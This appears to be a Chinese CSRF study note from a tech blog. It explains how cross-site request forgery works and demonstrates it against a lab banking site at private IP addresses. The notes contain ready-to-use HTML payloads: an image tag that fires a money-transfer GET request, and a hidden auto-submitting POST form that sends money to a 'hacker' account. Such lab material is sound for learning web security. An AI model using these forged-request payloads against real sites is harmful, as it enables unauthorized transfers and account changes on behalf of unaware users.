csrf学习笔记总结

跨站请求伪造csrf

csrf概述

掌握CSRF 漏洞原理
掌握CSRF 漏洞场景
掌握CSRF 漏洞验证

csrf原理

跨站请求伪造（Cross Site Request Forgery，CSRF）是一种攻击，它强制浏览器客户端用户在当前对其进行身份验证后的Web 应用程序上执行非本意操作的攻击，攻击的重点在于更改状态的请求，而不是盗取数据，因为攻击者无法查看伪造请求的响应。

借助于社工的一些帮助，例如，通过电子邮件或聊天发送链接，攻击者可以诱骗用户执行攻击者选择的操作。如果受害者是普通用户，则成功的CSRF 攻击可以强制用户执行更改状态的请求，例如转移资金、修改密码等操作。如果受害者是管理账户，CSRF 攻击会危及整个Web 应用程序。

关键点

受害者没有退出登录，受害者保持身份认证。
CSRF 继承了受害者的身份和特权，代表受害者执行非本意的、恶意的操作。
CSRF 会借用浏览器中与站点关联的所有身份凭据，例如用户的会话Cookie，IP 地址，Windows 域凭据等。

目标

CSRF 的目标是更改用户账户的状态，攻击者利用CSRF 发送的请求都是更改状态的请求，比如，转账、更改密码，购买商品等等。

CSRF 的场景中，攻击者是没有办法获得服务器的响应。

csrf场景

银行账户转账

搭建模拟银行网站 http://10.4.7.130/bank/

构造虚假网站

构造CSRF 攻击连接

攻击者通过标签构造GET 请求。
浏览器根据标签中的 SRC 属性，请求服务器资源，会自动带上身份认证信息

场景建模

起初admin用户账户余额70499

使用hello用户向admin用户转账1元

再次查看admin用户余额，增加一元，由此可见功能正常

开始csrf

构造跳转网页及功能实现

get请求csrf

<meta charset='utf-8'>
<img src='./1.jpg'><br />
<img src='http://10.4.7.164/bank/action.php?
username=hacker&money=100&submit=%E4%BA%A4%E6%98%93'
alt='宝刀在手，谁与争锋'>

post请求csrf

<meta charset='utf-8'>
<form name='csrf' action='http://10.4.7.164/bank/action.php' method='post'>
<input type='hidden' name='username' value='hacker'>
<input type='hidden' name='money' value='100'>
form>
<script>document.csrf.submit()script>
<img src="./1.jpg" ><br />



你可能感兴趣的:(csrf,学习,笔记)



D024+2组张大喵+《天长地久:给美君的信》读书笔记
我是张大喵
《天长地久:给美君的信》阅读第3天从小我是外公外婆带大的，跟他们的感情尤为深厚，外公去世我不在跟前这是我终生的遗憾。糖尿病人晚期腿脚开始溃烂，外公算是养护的好的，但是后期脚趾也开始变成紫色，除了心疼还是心疼。外公一辈子是个特别硬朗的人，他会用手左右醒鼻子，然后哈哈仰头笑，不拘小节，他的小缺点到成了他的特色，也成全了他爽朗的性格。我大学毕业后外公也在失智的路上越走越远，他开始变得沉默寡言，但只要我回

1130每日一省Day15(重启Day8)
活成自己的小太阳0329
豆豆早上八点钟起床，跟家人微聊过后自己起床洗漱，依旧检测后回家。面包、牛奶、砂糖桔做了豆豆的早餐。爸爸妈妈忙于工作，豆豆今天又有点撒欢儿，看了短视频还在妈妈的允许下“吃了鸡”（才发现游戏原来这么长时间呀）。午餐豆豆只吃了半个饺子为此还被先生训斥，好在晚餐豆豆主动提出自己的需求，豆豆跟爸爸一起做出炒方便面，自己吃了一大盘还喝了粥，开心晚餐。晚饭后妈妈简单收拾餐桌做完收尾工作后开启业余学习之路。今天收

2023-04-24做位 内心富足喜悦的感恩的人
茜薇妈妈成长空间
感恩家人感恩老公的付出每天叫孩子起床耐心给我很多包容。感恩老公主动买早餐，给我吃，感恩还特意给我留一下。感恩大宝主动收拾书包。感恩二宝积极提前准备好自己的学习用品，提前准备。感恩二宝愿意听妈妈说，感受妈妈不开心了，她也不开心。感恩今天婆婆邀请我一起吃午饭，感恩她给我更多外出的机遇去享受放松。感恩今天的察觉我感觉中午又要给我上课了，我告诉自己就去吃饭的。感恩一切都会好的。感恩万物，感恩内心安定，让我

2021-3-16晨间日记
言时姑娘
今天是3月16日，高阶营已经过了一半。今天必须完成第一篇长文的最后修改。起床：6:30就寝：有点模糊了，好像是十一点。天气：下土的天气结束，太阳回来了心情:焦虑和平静之间。任务清单昨日完成的任务，最重要的三件事：改进：第一篇长文更改、英语学习还要提前。习惯养成：起床时间还要提前周目标·完成进度20％学习·信息·阅读本周完成《一本小小的蓝色逻辑书》健康·饮食·锻炼坚持八分饱，少吃主食，每日揉腹。最美

自我迭代，从意识觉醒开始
睦珥空间设计
前几天参加了卡森海派家居组织的活动，主题是——【陈红卫作品展】。此次有收获也有遗憾，老师的分享让我收获很多。小时候因为家庭原因没有机会学习绘画，但个人对于绘画一直有种莫名的喜爱，从业以来也参加过几个绘画的培训班，但都没能坚持下来。这次活动又激起了我对绘画的热情。一定要坚持，哪怕每天画个鸡蛋，画个瓶盖都不要间断，练习手感及对生活细微的观察能力。活动中感触最深的是老师分享的户外写生，加上自己的艺术创作

青春要留遗憾
伊凌L
如果这所有一切的故事全都没有遗憾的话，那这一场青春还有什么意思呢？当一切都尘埃落定之时，你是否会想起曾经的青葱岁月，是否会想起那些年少轻狂的无所畏惧，是否会想起那些错过的遗憾？当一切都化作烟云之时，你是否会想起你曾经付出真心待过的朋友，是否会想起那一场场花样百出的试卷，是否会想起起早摸黑学习的韧劲？当时光不做停留继续往前走的时候，我们也在不停的变换着场所，从呱呱坠地于家至牙牙学语之时入幼儿园，再至

2020-05-08数学笔记没必要吗？如何记好数学笔记
阳春三月里的笑音
数学笔记没必要？如果你是数学天才，过目不忘，过耳不忘，可以绕道啦！否则，当然要好好记笔记啦！否则考场上凭借原始记忆、一遍听的记忆去跟别人听＋记两遍，再加高效复习了好几遍的记忆拼，怎么可能拼得过嘛？！学生从上学开始就应该是学着做笔记的，要求做笔记的老师也一定是教过学生方法，可往往开学很久之后，发现一些学生还是不会做笔记。要么沿用着自己的笨方法在记笔记，事倍功半；要么干脆偷懒不记笔记，考试前没法好好复

2019.05.31闺女身上的疹子越来越多
lenal_cb96
时间：2019.05.31农历：四月廿七星期五天气晴转雨闺女三周三【早睡早起】昨晚22:30睡，今早5:00起床。【学习】1.学习谈股论经群内容2.团队YY语音频道早课：陈惠老师分享总部指导师培训心得。【读经长智慧】读经人：闺女、妈妈本周读经计划：《易经》需卦、讼卦，《成语接龙》8，《少年儿童诗词启蒙》61-70。《新概念英语》lesson11，《大易诗》。【为自己而读】《道德经》第17遍。今天单

吕卫花中原焦点学习初19期，坚持分享第四天
梓旭她妈好棒呀
夏虫不可语冰。或许谁都体会不到当时为什么说那样的话，做那样的事，站在当事人的立场考虑问题，体会其中的不易。或许人与人之间就会多点理解与体谅，少点误会与分歧。在工作中有时特别不理解领导的做法和说法，觉得他们的一言一行不靠谱，现在想想，或许我们站的高度不一样，考虑的不够全面，自己在自己的小圈子里思考问题，一般都是利己的思维。有时候觉得家人或者同事或者朋友的行为不可思议，有可能人家有难的苦衷，所以，不同

阅读《美国中小学教师》感悟
王Zhi
最近我读了《美国中小学教师》，由赵勇、王安琳和杨文中编著。感悟一，中美中小学教师工作比较，首先，从教师在教学中的角色和教学方法来看，中美教师之间存在着很大的差异，中国中小学教师的角色是知识的传授者，教师主要的任务是向学生传授知识，包括课程标准规定的课本中的内容，和知识，超过课程标准范围的有关知识，或成拓展性的知识，而美国教师，则更多的是充当学生的学习的组织者，促进者，和帮助者。从教学方法看，中国中

218 因为相信，所以看见
回归自己的成长
#每日精进218/36520200805因为相信，所以看见，前路漫漫，用努力去践行，你值得拥有精彩，遇见各自的高光时刻。每天三件事1.工作事项：生产员工人体工程学培训；公众号协助；培训表单；瑜伽、健身拍照宣传；外训沟通；新项目人员策略；新员工入职培训协调；知识产权体系培训协调；车间员工试用期管理。2.陪伴家人：一起晚餐，做作业，聊天，玩耍洗刷。3.学习成长：早起，运动，冥想，专业学习，每日精进，英

每日古诗
书生又何妨
心似已灰之木，身如不系之舟。问汝平生功业，黄州惠州儋州。----宋代·苏轼《自题金山画像》(东坡一生漂泊，却豁达如此，我辈要学习的太多)

读书笔记｜什么是贡献？
云清雪
《被讨厌的勇气：自我启发之父阿德勒的哲学课》原文：这也跟接下来的讨论有关，阿德勒心理学认为“贡献”这个词非常沉重。例如，人怎样才能够获得“勇气”？阿德勒的见解是：人只有在能够感觉自己有价值的时候才可以获得勇气。是认为“自己有价值”？还是认为“自己是没有价值的存在”？如果能够认为“自己有价值”的话，那个人就能够接纳自我并建立起直面人生课题的勇气。这里的问题是“究竟怎样才能够感觉自己有价值”这一点。人

有追求，有事做，心里就有一盏灯
王焱_铁文
朋友问我孤独，寂寞吗？我给他发了以上的照片，这还只是一部分群和证书，的确，在他们眼里我更多的时候是守候在电脑前，但我真的不孤独，因为有追求，有事做，心里就有一盏灯说到上学期去支教，去的时候刚开春，山里气温还要低一些，去了不久我的手都裂了。好在天年开始一天天好起来了。相对于物质条件辛苦，更苦的是寝室没有网，学校的网也慢，这对于经常活跃于网上学习交流的我，确实带来了诸多不便，但就像她说的：你不折腾也不

2022-12-04入住新家
扬帆起航_8
昨晚，我一直在想我的那些杂物怎么摆放在新房子里，因为空间太狭小了。但是现在回过头来看，这些担心都是多余的，直接去做就知道怎么解决了。随着7点钟的闹铃响，昏昏沉沉的大脑开始运行，我打开我的任务栏，完成了今日的自由学习打卡，由于这两天忙着新租房，会计学习也没有打卡，决定明日开始回归正常。早上10.00，把被子装入袋子，再次收拾杂物，尽量把东西装在一个袋子，减少上下楼次数，因为没有电梯，高楼搬家真是受罪

(学习总结15)C++11小语法与拷贝问题
瞌睡不来
学习c++c++STL
C++11小语法与拷贝问题auto关键字范围forinitializer_list深拷贝与浅拷贝写时拷贝以下代码环境为VS2022C++。auto关键字在早期C/C++中auto的含义是：使用auto修饰的变量，是具有自动存储器的局部变量，不过一般都会隐藏，导致后来不重要了。C++11中，标准委员会赋予了auto全新的含义，即：auto不再是一个存储类型指示符，而是作为一个新的类型指示符来指示编译

129.给我一双慧眼，看透事物本质（一）
f79cd22b048f
黄金思维圈是西蒙斯涅克，他在TED的一次演讲中提到的。了解黄金思维圈能够帮助我们迅速看到一件事情的本质。黄金思维圈最基本的思维就是你遇到了一件事情，首先就是问自己“为什么”？你发现我们认知这个世界的方式有三个层面：第一个层面是what，就是“什么”。就是事情的表象我们具体做的每一件事。像有的人才被拉进一个群，他就问这是什么群，大家说是学习群，他说：噢，洗脑。他就跑了。仅凭表面现象，可能就妄加判断。

重新规划的2019年目标
读史读哲读人生
今天我上了邹小强老师的时间管理课，他在课中提到了一些时间管理工具，比如番茄、SMART法则、九宫格等。他在介绍这些工具或者方法时时常体现两个字：平衡。如果一个人一直重复在做一件是，很快就会觉得疲劳、厌烦。所以在用时间管理工具规划计划时，就要多写下不同的种类，而同一个种类的最多写三个。因此我将之前的目标，重新进行计划：1.学习：写作、CMA、英语2.娱乐：独自进电影院看场电影，去看场音乐剧3.家人：

【SpringMVC篇】——我们为什么学习SpringMVC？
南斋孤鹤
SSM框架Springservlet学习
我觉得在学一门技术之前，总要明白为什么而学？学习了这门技术能解决什么问题？或者说他是为了解决什么问题而诞生的？学了他能干什么？目录我觉得在学一门技术之前，总要明白为什么而学？学习了这门技术能解决什么问题？或者说他是为了解决什么问题而诞生的？学了他能干什么？为什么学习SpringMVC？Servlet作用具体来说，Servlet技术的主要作用如下：什么是springmvc？SpringMVC的出现解

简单易懂，财务报表分析学习笔记：市净率
偷懒苦行僧
一、市净率的定义市净率(Price-to-BookRatio，简称P/BPBR)指的是每股股价与每股净资产的比值；市净率=股票市价÷每股净资产或市净率=股票总市值÷净资产净资产=资产总额-负债总额二、市净率的作用市净率既反映了市场对于企业的评价，也为投资决策提供参考；在股票交易市场中，股票价格是由交易各方的实际交易价格确定，能够及时地反映出市场中投资者对企业的评价，再以净资产的账面价值作比较，为投

基于Spring Boot构建一个点餐系统
鹿屿二向箔
springboot后端java
基于SpringBoot构建一个点餐系统是一个很好的学习机会，可以帮助你掌握如何使用SpringBoot框架来开发一个完整的Web应用程序。下面是一个简化的示例，展示了如何构建一个基本的点餐系统。1.创建SpringBoot项目首先，你需要创建一个新的SpringBoot项目。可以使用SpringInitializr来快速生成基础项目：项目类型：MavenProject依赖项：SpringWeb,

【笔试题汇总】华为春招笔试题题解 2024-3-20
PXM的算法星球
大厂面试题华为面试数据结构算法
这里是paoxiaomo，一个现役ACMer，之后将会持续更新算法笔记系列以及笔试题题解系列本文章面向想打ICPC/蓝桥杯/天梯赛等程序设计竞赛，以及各个大厂笔试的选手感谢大家的订阅➕和喜欢有什么想看的算法专题可以私信博主（本文题面由清隆学长收集）01.K小姐的魔法药水问题描述K小姐是一位魔法师，她最近在研究一种神奇的魔法药水。这种药水由一系列魔法材料制成，每种材料都有一个正整数的魔法值。K小姐按

哆来咪画室/给亲爱的孩子们的一封信
哆来咪梅子老师
亲爱的孩子们：新的学期来临，首先梅子老师要表扬你们，别人都在玩耍的时候，你们选择了学习，不管是因为兴趣也好，是因为混时间也好，还是因为爸爸妈妈逼你们学习也好，既然来到了这里，老师就要表扬你们，你们的精神值得所有小朋友学习。哆来咪（企石点）亲爱的孩子们，我们来到了这里，不管是因为爱好也好，打发时间也好，你们既然来到了课堂，就请你们拿出学习的态度，认真对待。也许有的小朋友会说：“老师，我画得不好。”这

网络安全（黑客技术）—2024自学手册
一个迷人的黑客
web安全安全网络学习网络安全信息安全渗透测试
前言什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。如何成为一名黑客很多朋友在学习安全方面都会半路转行，因为不知如何去学，在这里，我将这个整份答案分为黑客（网络安全）入门必备、黑客（网络安全）职业指南、黑客（网络安全）学习导航三大章节，涉及价值观、方法论、执行力、行业分类、职位解读、法

如何用3个月零基础入门网络安全？_网络安全零基础怎么学习
白帽黑客啊一
web安全学习安全网安入门flutter
前言写这篇教程的初衷是很多朋友都想了解如何入门/转行网络安全，实现自己的“黑客梦”。文章的宗旨是：1.指出一些自学的误区2.提供客观可行的学习表3.推荐我认为适合小白学习的资源.大佬绕道哈！→点击获取网络安全资料·攻略←一、自学网络安全学习的误区和陷阱1.不要试图先成为一名程序员（以编程为基础的学习）再开始学习我在之前的回答中，我都一再强调不要以编程为基础再开始学习网络安全，一般来说，学习编程不但

2024年Docker开启并配置远程安全访问_docker开启远程访问，从青铜到王者的路线
2401_84281588
程序员网络安全学习面试
学习路线：这个方向初期比较容易入门一些，掌握一些基本技术，拿起各种现成的工具就可以开黑了。不过，要想从脚本小子变成黑客大神，这个方向越往后，需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容：网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。需要这份系统化资料的朋友，可以点击这里获取一个人可以走的很快，但一群人才能走的更远！不

【定位模块报名】
醉月光
001【定位模块报名】7143-月光倾城002目前我对于自己的定位还不够清晰，希望先从读写说开始练习，提升写和说的能力。我期待在定位模块中，认真学习猫叔推荐的书籍，通过按时按要求打卡的形式，逼自己每天思考和输出，提升工作效率，提升写和说的能力。当然，重点是通过这个模块的学习，找到适合自己的细分领域和清晰的努力方向。

SpringMVC的架构有什么优势？——视图与模型（二）
不会编程的小孩子
架构
#SpringMVC的架构有什么优势？——视图与模型（二）前言关键字：机器学习人工智能AIchatGPT学习实现使用搭建深度python事件远程dockermysql安全技术部署技术自动化代码视图(View)视图是展示结果的组件，它们负责渲染模型数据并生成HTML输出。SpringMVC支持多种视图技术，包括JSP、Thymeleaf等。视图(View)是SpringMVC中渲染并呈现结果的组件，

对世界保持好奇心
你看你看月亮的脸_0289
今天拿到了刚入手的油画棒，高尔乐全家福系列，送的工具也很齐全，下午便迫不及待的画了起来。继丙烯画、iPad插画、彩铅后的油画棒画，虽然整个过程小心翼翼，不知从何下手，但总归是完成了两幅画。橘子小奶泡橘子小奶泡可能是小时候接触的不多，除了学习就是学习，很少有业余爱好的原因，因此长大后想要把所有东西都尝试一遍。在以后的生活里，会继续学习钢琴、画画、摄影、视频剪辑......愿每个人都能对世界充满好奇心

《IP思维》76
农牧学堂一付海涛
《IP思维》（第76节）＃学习《IP思维》助你躺赢未来＃打造个人影响力，输出优质的内容是关键。首先，最基础的条件是必须对本领域有充分的认知，且必须有超过大部分人的行业洞察以及不断扩大行业体系、知识边际；其次，打破同质化，建立标识性。行业内大多数人都持相同观点或看法的事情，最好不要去掺和，你的每一个想法都来源于自己的深度思考；第三，切勿为了蹭热点刷存在感，热点蹭的不好，容易人设崩塌，损毁在粉丝心中的

基本数据类型和引用类型的初始值
3213213333332132
java基础
package com.array;
/**
* @Description 测试初始值
* @author FuJianyong
* 2015-1-22上午10:31:53
*/
public class ArrayTest {
ArrayTest at;
String str;
byte bt;
short s;
int i;
long

摘抄笔记--《编写高质量代码：改善Java程序的151个建议》
白糖_
高质量代码
        记得3年前刚到公司，同桌同事见我无事可做就借我看《编写高质量代码：改善Java程序的151个建议》这本书，当时看了几页没上心就没研究了。到上个月在公司偶然看到，于是乎又找来看看，我的天，真是非常多的干货，对于我这种静不下心的人真是帮助莫大呀。
 
        看完整本书，也记了不少笔记

【备忘】Django 常用命令及最佳实践
dongwei_6688
django
注意：本文基于 Django 1.8.2 版本
 
生成数据库迁移脚本（python 脚本）
python manage.py makemigrations polls
 说明：polls 是你的应用名字，运行该命令时需要根据你的应用名字进行调整
 
查看该次迁移需要执行的 SQL 语句（只查看语句，并不应用到数据库上）：
python manage.p

阶乘算法之一N! 末尾有多少个零
周凡杨
java算法阶乘面试效率
                                 &n

spring注入servlet
g21121
Spring注入
传统的配置方法是无法将bean或属性直接注入到servlet中的，配置代理servlet亦比较麻烦，这里其实有比较简单的方法，其实就是在servlet的init()方法中加入要注入的内容：
ServletContext application = getServletContext();
WebApplicationContext wac = WebApplicationContextUtil

Jenkins 命令行操作说明文档
510888780
centos

假设Jenkins的URL为http://22.11.140.38:9080/jenkins/
基本的格式为
java
基本的格式为
java -jar jenkins-cli.jar [-s JENKINS_URL] command [options][args]
下面具体介绍各个命令的作用及基本使用方法
1. &nb

UnicodeBlock检测中文用法
布衣凌宇
UnicodeBlock
/**  * 判断输入的是汉字  */ public static boolean isChinese(char c) {        Character.UnicodeBlock ub = Character.UnicodeBlock.of(c);    

java下实现调用oracle的存储过程和函数
aijuans
javaorale
 1.创建表：STOCK_PRICES
 
  2.插入测试数据：
 
  3.建立一个返回游标： 
PKG_PUB_UTILS
  4.创建和存储过程：P_GET_PRICE
 
  5.创建函数：
  6.JAVA调用存储过程返回结果集
JDBCoracle10G_INVO

Velocity Toolbox
antlove
模板toolboxvelocity
velocity.VelocityUtil
package velocity;
import org.apache.velocity.Template;
import org.apache.velocity.app.Velocity;
import org.apache.velocity.app.VelocityEngine;
import org.apache.velocity.c

JAVA正则表达式匹配基础
百合不是茶
java正则表达式的匹配
 
正则表达式;提高程序的性能,简化代码,提高代码的可读性,简化对字符串的操作
 
正则表达式的用途;
字符串的匹配
字符串的分割
字符串的查找
字符串的替换
 
 
 
正则表达式的验证语法
   
[a] //[]表示这个字符只出现一次 ,[a] 表示a只出现一

是否使用EL表达式的配置
bijian1013
jspweb.xmlELEasyTemplate
        今天在开发过程中发现一个细节问题，由于前端采用EasyTemplate模板方法实现数据展示，但老是不能正常显示出来。后来发现竟是EL将我的EasyTemplate的${...}解释执行了，导致我的模板不能正常展示后台数据。
        网

精通Oracle10编程SQL(1-3)PLSQL基础
bijian1013
oracle数据库plsql
--只包含执行部分的PL/SQL块
--set serveroutput off
begin
dbms_output.put_line('Hello,everyone!');
end;
select * from emp;
--包含定义部分和执行部分的PL/SQL块
declare
v_ename varchar2(5);
begin
select 

【Nginx三】Nginx作为反向代理服务器
bit1129
nginx
Nginx一个常用的功能是作为代理服务器。代理服务器通常完成如下的功能：
 
接受客户端请求
将请求转发给被代理的服务器
从被代理的服务器获得响应结果
把响应结果返回给客户端
实例
本文把Nginx配置成一个简单的代理服务器
对于静态的html和图片，直接从Nginx获取
对于动态的页面，例如JSP或者Servlet，Nginx则将请求转发给Res

Plugin execution not covered by lifecycle configuration: org.apache.maven.plugin
blackproof
maven报错
转：http://stackoverflow.com/questions/6352208/how-to-solve-plugin-execution-not-covered-by-lifecycle-configuration-for-sprin
 
maven报错：
Plugin execution not covered by lifecycle configuration: 

发布docker程序到marathon
ronin47
docker 发布应用
1 发布docker程序到marathon 1.1 搭建私有docker registry 1.1.1 安装docker regisry
docker pull docker-registry
docker run -t -p 5000:5000 docker-registry
下载docker镜像并发布到私有registry
docker pull consol/tomcat-8.0 

java-57-用两个栈实现队列&&用两个队列实现一个栈
bylijinnan
java

import java.util.ArrayList;
import java.util.List;
import java.util.Stack;
/*
* Q 57 用两个栈实现队列
*/
public class QueueImplementByTwoStacks {
private Stack<Integer> stack1;
pr

Nginx配置性能优化
cfyme
nginx
转载地址：http://blog.csdn.net/xifeijian/article/details/20956605
 
大多数的Nginx安装指南告诉你如下基础知识——通过apt-get安装，修改这里或那里的几行配置，好了，你已经有了一个Web服务器了。而且，在大多数情况下，一个常规安装的nginx对你的网站来说已经能很好地工作了。然而，如果你真的想挤压出Nginx的性能，你必

[JAVA图形图像]JAVA体系需要稳扎稳打,逐步推进图像图形处理技术
comsci
java

     对图形图像进行精确处理，需要大量的数学工具，即使是从底层硬件模拟层开始设计，也离不开大量的数学工具包，因为我认为，JAVA语言体系在图形图像处理模块上面的研发工作，需要从开发一些基础的，类似实时数学函数构造器和解析器的软件包入手，而不是急于利用第三方代码工具来实现一个不严格的图形图像处理软件......
  &nb

MonkeyRunner的使用
dai_lm
androidMonkeyRunner
要使用MonkeyRunner，就要学习使用Python，哎
先抄一段官方doc里的代码
作用是启动一个程序（应该是启动程序默认的Activity），然后按MENU键，并截屏
# Imports the monkeyrunner modules used by this program
from com.android.monkeyrunner import MonkeyRun

Hadoop-- 海量文件的分布式计算处理方案
datamachine
mapreducehadoop分布式计算
csdn的一个关于hadoop的分布式处理方案，存档。
原帖：http://blog.csdn.net/calvinxiu/article/details/1506112。
    Hadoop 是Google MapReduce的一个Java实现。MapReduce是一种简化的分布式编程模式，让程序自动分布到一个由普通机器组成的超大集群上并发执行。就如同ja

以資料庫驗證登入
dcj3sjt126com
yii
以資料庫驗證登入
由於 Yii 內定的原始框架程式, 採用綁定在UserIdentity.php 的 demo 與 admin 帳號密碼:    public function authenticate()    {        $users=array( &nbs

github做webhooks：[2]php版本自动触发更新
dcj3sjt126com
githubgitwebhooks
上次已经说过了如何在github控制面板做查看url的返回信息了。这次就到了直接贴钩子代码的时候了。
工具/原料
git
github
方法/步骤
  在github的setting里面的webhooks里把我们的url地址填进去。
  钩子更新的代码如下： error_reportin

Eos开发常用表达式
蕃薯耀
Eos开发Eos入门Eos开发常用表达式
Eos开发常用表达式
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
蕃薯耀 2014年8月18日 15:03:35 星期一
 
 
&

SpringSecurity3.X--SpEL 表达式
hanqunfeng
SpringSecurity
使用 Spring 表达式语言配置访问控制，要实现这一功能的直接方式是在<http>配置元素上添加 use-expressions 属性：
 
<http auto-config="true" use-expressions="true">
这样就会在投票器中自动增加一个投票器：org.springframework

Redis vs Memcache
IXHONG
redis
1. Redis中，并不是所有的数据都一直存储在内存中的，这是和Memcached相比一个最大的区别。
2. Redis不仅仅支持简单的k/v类型的数据，同时还提供list，set，hash等数据结构的存储。
3. Redis支持数据的备份，即master-slave模式的数据备份。
4. Redis支持数据的持久化，可以将内存中的数据保持在磁盘中，重启的时候可以再次加载进行使用。
Red

Python - 装饰器使用过程中的误区解读
kvhur
JavaScriptjqueryhtml5css
大家都知道装饰器是一个很著名的设计模式，经常被用于AOP(面向切面编程)的场景，较为经典的有插入日志，性能测试，事务处理，Web权限校验， Cache等。
原文链接：http://www.gbtags.com/gb/share/5563.htm
Python语言本身提供了装饰器语法（@），典型的装饰器实现如下：  
@function_wrapper
de

架构师之mybatis-----update 带case when 针对多种情况更新
nannan408
case when
1.前言.
   如题.
2. 代码.
 
<update id="batchUpdate" parameterType="java.util.List">
<foreach collection="list" item="list" index=&

Algorithm算法视频教程
栏目记者
Algorithm算法
课程：Algorithm算法视频教程
百度网盘下载地址： http://pan.baidu.com/s/1qWFjjQW 密码: 2mji
程序写的好不好,还得看算法屌不屌！Algorithm算法博大精深。
一、课程内容：
课时1、算法的基本概念 + Sequential search
课时2、Binary search
课时3、Hash table
课时4、Algor

C语言算法之冒泡排序
qiufeihu
c算法
任意输入10个数字由小到大进行排序。
代码：
#include <stdio.h>
int main()
{
int i,j,t,a[11]; /*定义变量及数组为基本类型*/
for(i = 1;i < 11;i++){
scanf("%d",&a[i]); /*从键盘中输入10个数*/
}
for

JSP异常处理
wyzuomumu
Webjsp
1.在可能发生异常的网页中通过指令将HTTP请求转发给另一个专门处理异常的网页中:
<%@ page errorPage="errors.jsp"%>
 
2.在处理异常的网页中做如下声明：
errors.jsp:
<%@ page isErrorPage="true"%>，这样设置完后就可以在网页中直接访问exc








按字母分类：
ABCDEFGHIJKLMNOPQRSTUVWXYZ其他






首页 -
关于我们 -
站内搜索 -
Sitemap -
侵权投诉

版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved.